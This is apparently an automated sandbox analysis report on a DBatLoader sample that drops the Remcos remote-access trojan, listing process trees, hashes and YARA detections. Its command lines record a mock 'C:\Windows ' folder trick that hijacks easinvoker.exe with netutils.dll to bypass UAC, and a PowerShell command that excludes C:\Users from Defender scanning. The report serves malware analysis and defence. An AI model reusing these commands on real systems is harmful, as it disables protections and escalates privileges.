                                                                                          Reputation:low
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:12
                                                                                          Start time:19:30:41
                                                                                          Start date:23/08/2023
                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\ElpuxpkiO.bat" "
                                                                                          Imagebase:0x50000
                                                                                          File size:232'960 bytes
                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:13
                                                                                          Start time:19:30:41
                                                                                          Start date:23/08/2023
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff766460000
                                                                                          File size:625'664 bytes
                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:14
                                                                                          Start time:19:30:41
                                                                                          Start date:23/08/2023
                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:cmd.exe /c mkdir "\\?\C:\Windows "
                                                                                          Imagebase:0x50000
                                                                                          File size:232'960 bytes
                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:15
                                                                                          Start time:19:30:41
                                                                                          Start date:23/08/2023
                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:cmd.exe /c mkdir "\\?\C:\Windows \System32"
                                                                                          Imagebase:0x50000
                                                                                          File size:232'960 bytes
                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:16
                                                                                          Start time:19:30:41
                                                                                          Start date:23/08/2023
                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:cmd.exe /c ECHO F
                                                                                          Imagebase:0x50000
                                                                                          File size:232'960 bytes
                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:17
                                                                                          Start time:19:30:41
                                                                                          Start date:23/08/2023
                                                                                          Path:C:\Windows\SysWOW64\xcopy.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:xcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /Y
                                                                                          Imagebase:0xcb0000
                                                                                          File size:44'544 bytes
                                                                                          MD5 hash:9F3712DDC0D7FE3D75B8A06C6EE8E68C
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:moderate
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:18
                                                                                          Start time:19:30:42
                                                                                          Start date:23/08/2023
                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:cmd.exe /c ECHO F
                                                                                          Imagebase:0x50000
                                                                                          File size:232'960 bytes
                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:19
                                                                                          Start time:19:30:42
                                                                                          Start date:23/08/2023
                                                                                          Path:C:\Windows\SysWOW64\xcopy.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:xcopy "netutils.dll" "C:\Windows \System32\" /K /D /H /Y
                                                                                          Imagebase:0xcb0000
                                                                                          File size:44'544 bytes
                                                                                          MD5 hash:9F3712DDC0D7FE3D75B8A06C6EE8E68C
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:20
                                                                                          Start time:19:30:42
                                                                                          Start date:23/08/2023
                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:cmd.exe /c ECHO F
                                                                                          Imagebase:0x50000
                                                                                          File size:232'960 bytes
                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:21
                                                                                          Start time:19:30:42
                                                                                          Start date:23/08/2023
                                                                                          Path:C:\Windows\SysWOW64\xcopy.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:xcopy "KDECO.bat" "C:\Windows \System32\" /K /D /H /Y
                                                                                          Imagebase:0xcb0000
                                                                                          File size:44'544 bytes
                                                                                          MD5 hash:9F3712DDC0D7FE3D75B8A06C6EE8E68C
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:22
                                                                                          Start time:19:30:43
                                                                                          Start date:23/08/2023
                                                                                          Path:C:\Windows \System32\easinvoker.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows \System32\easinvoker.exe
                                                                                          Imagebase:0x7ff60e670000
                                                                                          File size:131'648 bytes
                                                                                          MD5 hash:231CE1E1D7D98B44371FFFF407D68B59
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Antivirus matches:
                                                                                          • Detection: 0%, ReversingLabs
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:23
                                                                                          Start time:19:30:43
                                                                                          Start date:23/08/2023
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\windows \system32\KDECO.bat""
                                                                                          Imagebase:0x7ff6f1940000
                                                                                          File size:273'920 bytes
                                                                                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:24
                                                                                          Start time:19:30:43
                                                                                          Start date:23/08/2023
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff766460000
                                                                                          File size:625'664 bytes
                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:25
                                                                                          Start time:19:30:43
                                                                                          Start date:23/08/2023
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:cmd.exe /c start /min powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
                                                                                          Imagebase:0x7ff6f1940000
                                                                                          File size:273'920 bytes
                                                                                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:26
                                                                                          Start time:19:30:43
                                                                                          Start date:23/08/2023
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
                                                                                          Imagebase:0x7ff62aed0000
                                                                                          File size:447'488 bytes
                                                                                          MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:.Net C# or VB.NET
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:27
                                                                                          Start time:19:30:43
                                                                                          Start date:23/08/2023
                                                                                          Path:C:\Windows\SysWOW64\PING.EXE
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:ping 127.0.0.1 -n 6
                                                                                          Imagebase:0x13a0000
                                                                                          File size:18'944 bytes
                                                                                          MD5 hash:70C24A306F768936563ABDADB9CA9108
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:28
                                                                                          Start time:19:30:44
                                                                                          Start date:23/08/2023
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff766460000
                                                                                          File size:625'664 bytes
                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:29
                                                                                          Start time:19:30:46
                                                                                          Start date:23/08/2023
                                                                                          Path:C:\Windows\SysWOW64\colorcpl.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Windows\System32\colorcpl.exe
                                                                                          Imagebase:0xb30000
                                                                                          File size:86'528 bytes
                                                                                          MD5 hash:746F3B5E7652EA0766BA10414D317981
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001D.00000002.636155790.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001D.00000002.636155790.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000001D.00000002.636155790.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001D.00000002.636155790.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                          • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001D.00000002.636155790.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001D.00000002.637978823.0000000014C28000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:32
                                                                                          Start time:19:30:51
                                                                                          Start date:23/08/2023
                                                                                          Path:C:\Users\Public\Libraries\Elpuxpki.PIF
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\Public\Libraries\Elpuxpki.PIF"
                                                                                          Imagebase:0x400000
                                                                                          File size:1'131'463 bytes
                                                                                          MD5 hash:533B3DF0E597C50E1129EC807FD6BBCF
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:Borland Delphi
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: C:\Users\Public\Libraries\Elpuxpki.PIF, Author: Joe Security
                                                                                          Antivirus matches:
                                                                                          • Detection: 100%, Avira
                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                          • Detection: 92%, ReversingLabs
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:33
                                                                                          Start time:19:31:01
                                                                                          Start date:23/08/2023
                                                                                          Path:C:\Users\Public\Libraries\Elpuxpki.PIF
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\Public\Libraries\Elpuxpki.PIF"
                                                                                          Imagebase:0x400000
                                                                                          File size:1'131'463 bytes
                                                                                          MD5 hash:533B3DF0E597C50E1129EC807FD6BBCF
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:Borland Delphi
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:35
                                                                                          Start time:19:31:18
                                                                                          Start date:23/08/2023
                                                                                          Path:C:\Windows\SysWOW64\SndVol.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Windows\System32\SndVol.exe
                                                                                          Imagebase:0x12c0000
                                                                                          File size:226'264 bytes
                                                                                          MD5 hash:1EF1A9B89A984DD25DB61DC1AF2548B8
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000023.00000002.532580760.0000000003300000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000023.00000002.532580760.0000000003300000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000023.00000002.532580760.0000000003300000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000023.00000002.532580760.0000000003300000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                          • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000023.00000002.532580760.0000000003300000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000023.00000002.532520297.0000000000487000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:38
                                                                                          Start time:19:31:32
                                                                                          Start date:23/08/2023
                                                                                          Path:C:\Windows\SysWOW64\colorcpl.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Windows\System32\colorcpl.exe
                                                                                          Imagebase:0xb30000
                                                                                          File size:86'528 bytes
                                                                                          MD5 hash:746F3B5E7652EA0766BA10414D317981
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000026.00000002.564309116.0000000000608000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000026.00000002.564661201.0000000002B50000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000026.00000002.564661201.0000000002B50000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000026.00000002.564661201.0000000002B50000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000026.00000002.564661201.0000000002B50000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                          • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000026.00000002.564661201.0000000002B50000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                          Has exited:true

                                                                                          Disassembly

                                                                                          Reset < >

                                                                                            Non-executed Functions

                                                                                            Function 04E39B3A Relevance: .1, Instructions: 95COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000003.390810761.0000000004E34000.00000004.00001000.00020000.00000000.sdmp, Offset: 04E34000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_3_4e38000_0vJrK0NCd1.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9c1035a9cc056e3ce404db35ea2504aa87f6ce84aa14c6ad485a0ffd09ef03d4
                                                                                            • Instruction ID: f93f3a587d31ec2167aec72392595182bd019ce6a0095da7c8667ca8ffbebd0b
                                                                                            • Opcode Fuzzy Hash: 9c1035a9cc056e3ce404db35ea2504aa87f6ce84aa14c6ad485a0ffd09ef03d4
                                                                                            • Instruction Fuzzy Hash: 50317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04E39B3A Relevance: .1, Instructions: 95COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000003.390810761.0000000004E34000.00000004.00001000.00020000.00000000.sdmp, Offset: 04E38000, based on PE: false
                                                                                            • Associated: 00000000.00000003.392440958.0000000004E38000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_3_4e38000_0vJrK0NCd1.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9c1035a9cc056e3ce404db35ea2504aa87f6ce84aa14c6ad485a0ffd09ef03d4
                                                                                            • Instruction ID: f93f3a587d31ec2167aec72392595182bd019ce6a0095da7c8667ca8ffbebd0b
                                                                                            • Opcode Fuzzy Hash: 9c1035a9cc056e3ce404db35ea2504aa87f6ce84aa14c6ad485a0ffd09ef03d4
                                                                                            • Instruction Fuzzy Hash: 50317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04E35A1C Relevance: .1, Instructions: 94COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000003.390810761.0000000004E34000.00000004.00001000.00020000.00000000.sdmp, Offset: 04E34000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_3_4e34000_0vJrK0NCd1.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                            • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                                                            • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                            • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04E3DD74 Relevance: .1, Instructions: 94COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000003.390838352.0000000004E3C000.00000004.00001000.00020000.00000000.sdmp, Offset: 04E3C000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_3_4e3c000_0vJrK0NCd1.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                            • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                                                            • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                            • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04E38CC0 Relevance: .1, Instructions: 57COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000003.392440958.0000000004E38000.00000004.00001000.00020000.00000000.sdmp, Offset: 04E34000, based on PE: false
                                                                                            • Associated: 00000000.00000003.390810761.0000000004E34000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_3_4e38000_0vJrK0NCd1.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a67aa279c2360b243954826f7662d6649a9a6d2b7e26e64c4f302e303bd04852
                                                                                            • Instruction ID: 56b8ffad9403e7d3bf51fb845874e0a7a4bfd1ec970ac7fca3ffe7b4cbf62598
                                                                                            • Opcode Fuzzy Hash: a67aa279c2360b243954826f7662d6649a9a6d2b7e26e64c4f302e303bd04852
                                                                                            • Instruction Fuzzy Hash: EA112E6284E3D0ABDF069B7858945C67F80FA1371174BE5EBC890CF48FE364114B9B16
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04E38CC0 Relevance: .1, Instructions: 57COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000003.392440958.0000000004E38000.00000004.00001000.00020000.00000000.sdmp, Offset: 04E38000, based on PE: false
                                                                                            • Associated: 00000000.00000003.390810761.0000000004E34000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_3_4e38000_0vJrK0NCd1.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a67aa279c2360b243954826f7662d6649a9a6d2b7e26e64c4f302e303bd04852
                                                                                            • Instruction ID: 56b8ffad9403e7d3bf51fb845874e0a7a4bfd1ec970ac7fca3ffe7b4cbf62598
                                                                                            • Opcode Fuzzy Hash: a67aa279c2360b243954826f7662d6649a9a6d2b7e26e64c4f302e303bd04852
                                                                                            • Instruction Fuzzy Hash: EA112E6284E3D0ABDF069B7858945C67F80FA1371174BE5EBC890CF48FE364114B9B16
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04E38D2C Relevance: .0, Instructions: 37COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000003.392440958.0000000004E38000.00000004.00001000.00020000.00000000.sdmp, Offset: 04E34000, based on PE: false
                                                                                            • Associated: 00000000.00000003.390810761.0000000004E34000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_3_4e38000_0vJrK0NCd1.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3b55cbb775517b65ce00c72499cdd8536e475b5ece931b95b2162223c24c86c3
                                                                                            • Instruction ID: f501798e23a459fd7d9c3e3073bd6276d9fec7069106ca2b73526e0b848788da
                                                                                            • Opcode Fuzzy Hash: 3b55cbb775517b65ce00c72499cdd8536e475b5ece931b95b2162223c24c86c3
                                                                                            • Instruction Fuzzy Hash: A901086184F3D06BDF458B38589058BAF44B81390070BDAEBCC50CF8CFA355411BA755
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04E38D2C Relevance: .0, Instructions: 37COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000003.392440958.0000000004E38000.00000004.00001000.00020000.00000000.sdmp, Offset: 04E38000, based on PE: false
                                                                                            • Associated: 00000000.00000003.390810761.0000000004E34000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_3_4e38000_0vJrK0NCd1.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3b55cbb775517b65ce00c72499cdd8536e475b5ece931b95b2162223c24c86c3
                                                                                            • Instruction ID: f501798e23a459fd7d9c3e3073bd6276d9fec7069106ca2b73526e0b848788da
                                                                                            • Opcode Fuzzy Hash: 3b55cbb775517b65ce00c72499cdd8536e475b5ece931b95b2162223c24c86c3
                                                                                            • Instruction Fuzzy Hash: A901086184F3D06BDF458B38589058BAF44B81390070BDAEBCC50CF8CFA355411BA755
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04E38D34 Relevance: .0, Instructions: 35COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000003.392440958.0000000004E38000.00000004.00001000.00020000.00000000.sdmp, Offset: 04E34000, based on PE: false
                                                                                            • Associated: 00000000.00000003.390810761.0000000004E34000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_3_4e38000_0vJrK0NCd1.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5fd037a3167b35d3bee3dd4b1ca515faaf046044032b4af3d33edc1392d4acf9
                                                                                            • Instruction ID: 325ccd17d57f5d9608d6045cc7f50ec3bcc15015ae42b4a5d88a86d793612954
                                                                                            • Opcode Fuzzy Hash: 5fd037a3167b35d3bee3dd4b1ca515faaf046044032b4af3d33edc1392d4acf9
                                                                                            • Instruction Fuzzy Hash: 4201D96144F3D06BDF459B38589058BBF44B91394130BDAE7CC50CF8CFA355411BA755
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04E38D34 Relevance: .0, Instructions: 35COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000003.392440958.0000000004E38000.00000004.00001000.00020000.00000000.sdmp, Offset: 04E38000, based on PE: false
                                                                                            • Associated: 00000000.00000003.390810761.0000000004E34000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_3_4e38000_0vJrK0NCd1.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5fd037a3167b35d3bee3dd4b1ca515faaf046044032b4af3d33edc1392d4acf9
                                                                                            • Instruction ID: 325ccd17d57f5d9608d6045cc7f50ec3bcc15015ae42b4a5d88a86d793612954
                                                                                            • Opcode Fuzzy Hash: 5fd037a3167b35d3bee3dd4b1ca515faaf046044032b4af3d33edc1392d4acf9
                                                                                            • Instruction Fuzzy Hash: 4201D96144F3D06BDF459B38589058BBF44B91394130BDAE7CC50CF8CFA355411BA755
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04E38D3C Relevance: .0, Instructions: 33COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000003.392440958.0000000004E38000.00000004.00001000.00020000.00000000.sdmp, Offset: 04E34000, based on PE: false
                                                                                            • Associated: 00000000.00000003.390810761.0000000004E34000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_3_4e38000_0vJrK0NCd1.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e09af03244b7d80ff3675a4aa54c219e19cd5225935d86f53d1a3aabe8863fdc
                                                                                            • Instruction ID: 3fd9366a49d97435f2358a93c8301323ff4c155dfaff832744019cc59cf68e99
                                                                                            • Opcode Fuzzy Hash: e09af03244b7d80ff3675a4aa54c219e19cd5225935d86f53d1a3aabe8863fdc
                                                                                            • Instruction Fuzzy Hash: EC01D46284F3D06BEF469B38589058BBF44B913A4130BDAEBCC50CF8CFA355411BAB56
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04E38D3C Relevance: .0, Instructions: 33COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000003.392440958.0000000004E38000.00000004.00001000.00020000.00000000.sdmp, Offset: 04E38000, based on PE: false
